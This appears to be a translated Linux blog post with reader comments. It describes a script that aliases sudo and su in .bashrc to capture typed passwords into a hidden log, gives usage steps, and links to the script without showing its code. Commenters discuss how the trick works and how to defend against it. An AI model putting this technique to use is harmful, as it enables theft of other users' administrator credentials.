Uzyskaj hasło ROOT

Natknąłem się na skrypt, który zmienia plik .bashrc tworząc alias dla „sudo” i „su”. nie wcześniej niż bez wykonania kopii zapasowej pliku w celu późniejszego przywrócenia go.

Służy do tego, że wysyła komunikat o błędzie podczas używania „sudo” lub „su” i przechwytuje hasło w dzienniku o nazwie „.plog”, który znajduje się w katalogu głównym.

Tryb użytkowania

  1. Zapisz skrypt
  2. Nadaj mu uprawnienia do wykonywania.
  3. Uruchom go w terminalu
  4. Zamknij terminal
  5. Czekać.
  6. Następnie sprawdź plik .plog. I musi istnieć hasło roota lub jakiegoś użytkownika, który jest w sudoers.

http://paste.desdelinux.net/4691

CIESZYĆ SIĘ.


Zostaw swój komentarz

Twój adres e-mail nie zostanie opublikowany. Wymagane pola są oznaczone *

*

*

  1. Odpowiedzialny za dane: Miguel Ángel Gatón
  2. Cel danych: kontrola spamu, zarządzanie komentarzami.
  3. Legitymacja: Twoja zgoda
  4. Przekazywanie danych: Dane nie będą przekazywane stronom trzecim, z wyjątkiem obowiązku prawnego.
  5. Przechowywanie danych: baza danych hostowana przez Occentus Networks (UE)
  6. Prawa: w dowolnym momencie możesz ograniczyć, odzyskać i usunąć swoje dane.

  1.   v3 na powiedział

    dla tych gości jest to, że fizyczne bezpieczeństwo naszego zespołu nie powinno być zaniedbane

    1.    Truko22 powiedział

      Zgadza się, jeśli komputer jest pożyczony na chwilę, musisz sprawdzić aliasy 😀

  2.   Lolo powiedział

    Niewinne pytanie:

    W jaki sposób skrypt zmienia plik .bashrc użytkownika sudoer, który nie jest sobą?

  3.   Blaire pascal powiedział

    Oo, naprawdę to lubię. Testowanie.

  4.   pacoeloyo powiedział

    Więc zabezpieczenia i szyfrowanie, których używamy w GNU / Linux są bezwartościowe? Uważam, że tak nie jest, ktokolwiek spróbuje, powinien skomentować wyniki. Odkąd korzystałem z tego systemu, przeczytałem, że poziomy szyfrowania w Linuksie są bardzo wysokie.Hasła są szyfrowane przy użyciu jednokierunkowych algorytmów kryptograficznych i teraz okazuje się, że przy prostym skrypcie szyfrowanie jest pomijane. Przepraszam, ale nie wierz w to.

    1.    @JlcMux. powiedział

      Jeśli zadziała, spójrz. Dzieje się tak, że skrypt tworzy alias w .bashrc z sudo i su. A kiedy wpiszesz su i / lub sudo. Najpierw czyta alias. nie polecenie jako takie. więc kiedy piszesz hasło, umieszcza je w zwykłym pliku tekstowym. a następnie usuwa alias i pozwala używać sudo lub su common. To znaczy, to jest jak pishing. Nie chodzi o to, że omija szyfrowanie. jest to fałszywy login.

      1.    pacoeloyo powiedział

        Ok, teraz, jeśli to rozumiem, byłem już zaskoczony, że pominąłem tę ochronę do torrera .. Dzięki za wyjaśnienie.

        1.    kike powiedział

          Jasne, ale najtrudniejsze pozostaje wkradnięcie skryptu do komputera ofiary, uruchomienie go, a następnie zdalne pobranie pliku lub wysłanie go pocztą elektroniczną. Tam każdy będzie musiał użyć swojej wyobraźni!

    2.    zawsze powiedział

      Myślę, że bardzo przesadziłeś pacoeloyo. Jest to prosty trojan, wymagający od użytkownika ominięcia różnych środków bezpieczeństwa i lokalnej obecności atakującego. To istnieje w każdym systemie operacyjnym.
      Odnośnie skryptu ... jeśli się nie mylę, większość obecnych SUDO uwierzytelnia się za pomocą hasła użytkownika, a nie hasła roota. Zatem hasło, które można uzyskać, jest hasłem użytkownika (obecnym w sudoers).
      pozdrowienia

      1.    @JlcMux. powiedział

        jest z sudo lub su. Również jeśli użytkownik może używać sudo, to dlatego, że jest w sudoers i ma takie same uprawnienia jak root .. czy nie?

        1.    zawsze powiedział

          nie zawsze, zależy to od konfiguracji sudoers. W każdym razie najczęściej jest tak, że masz pełny dostęp.
          Chodzi o to, że akcje wykonywane za pomocą sudo są zwykle rejestrowane

      2.    diazepam powiedział

        proste wywołanie „su” daje dostęp do konta roota.

  5.   ps powiedział

    Jest to bardzo niebezpieczne, jeśli używasz dobrych haseł we wspólnej klasie lub środowisku warsztatowym. Mogą to dla ciebie zagrać. Cóż, mogli w to zagrać ...

    Nie jest przydatne odkrywanie haseł nieznajomego, ale myślę, że znajomy wystarczy.

    I pamiętaj, większość z nich powiela swoje hasła lub używa wspólnych wzorców. Nigdy ich nie lekceważ. Jeśli jesteście oczywiście draniami ...

  6.   Germaine powiedział

    Cóż, nie bawię się ... nie mam nic do ukrycia, nawet pytań egzaminacyjnych ... i jeśli potrzebuję hasła, zadaję je ... i mam swoje pliki na zewnętrznym dysku twardym. .. z kopią zapasową na moim laptopie, która pozostaje w House.
    Musimy szukać prostoty i praktyczności, dziś żyję, jutro nie wiem ... Żyję dzisiaj, reszta to nadgodziny.

  7.   ferchmetal powiedział

    Będę o tym pamiętać, dziękuję.

  8.   elynx powiedział

    Ciekawy!

  9.   Lolo powiedział

    Jak ten skrypt kopiuje się do .bashrc użytkownika sudoer?

    Jeśli masz konto na komputerze, nie możesz wejść do domu innego użytkownika, chyba że masz pozwolenie, a nadal wątpię, czy możesz zmodyfikować .bashrc ofiary.

    Bardzo wątpię, czy zadziała, jeśli użytkownik sudoer nie będzie wyjątkowo nieostrożny.

  10.   lex aleksandre powiedział

    Musimy bardzo uważać na taką pogodę!

  11.   Marcos powiedział

    Jedno pytanie, jeśli nie mam hasła roota, jak mogę przyznać uprawnienia do wykonywania pliku? Lub normalny użytkownik pracuje?

    1.    @JlcMux. powiedział

      Jasny. Uprawnienia do wykonywania nie są wyłączne dla użytkownika root.

      1.    Alberto Aru. powiedział

        WSPARCIE!
        po wypróbowaniu usunąłem .sudo_sd i nie mogę znaleźć niczego w google (ani innych wyszukiwarkach)

        1.    Alberto Aru. powiedział

          Usunąłem plik .plog i został on automatycznie usunięty .sudo_sd i nie mogę zalogować się jako root

          1.    Alberto Aru. powiedział

            NAPRAWIONE PRZEZ KOMENTARZĘ DO ALIASÓW

  12.   Karta powiedział

    Jeśli to zadziała na MAC, przejdę do sklepu Apple… hej! ale tylko trochę, nie w planie terrorystycznym 😉

  13.   Ateusz powiedział

    Ciekawy wpis

    Wątpliwość

    A jeśli używam gksu lub jego odpowiednika w kde

    Przechwytuje również hasło

    pozdrowienia

  14.   życie kasku powiedział

    Wykonania tego skryptu można uniknąć, nadając .bashrc uprawnienia tylko do odczytu

  15.   Błażek powiedział

    Sprawdzone, działa, aunk ma swoje ograniczenia. W Linuksie zawsze uczysz się nowych rzeczy.

  16.   Alberto Aru. powiedział

    Jak mogę cofnąć wprowadzone zmiany? Usunąłem .plog i nie pozwala mi używać sudo:
    bash: /home/alberto/.sudo_sd: Plik lub katalog nie istnieje

    1.    Alberto Aru. powiedział

      NAPRAWIONE PRZEZ KOMENTARZĘ DO ALIASÓW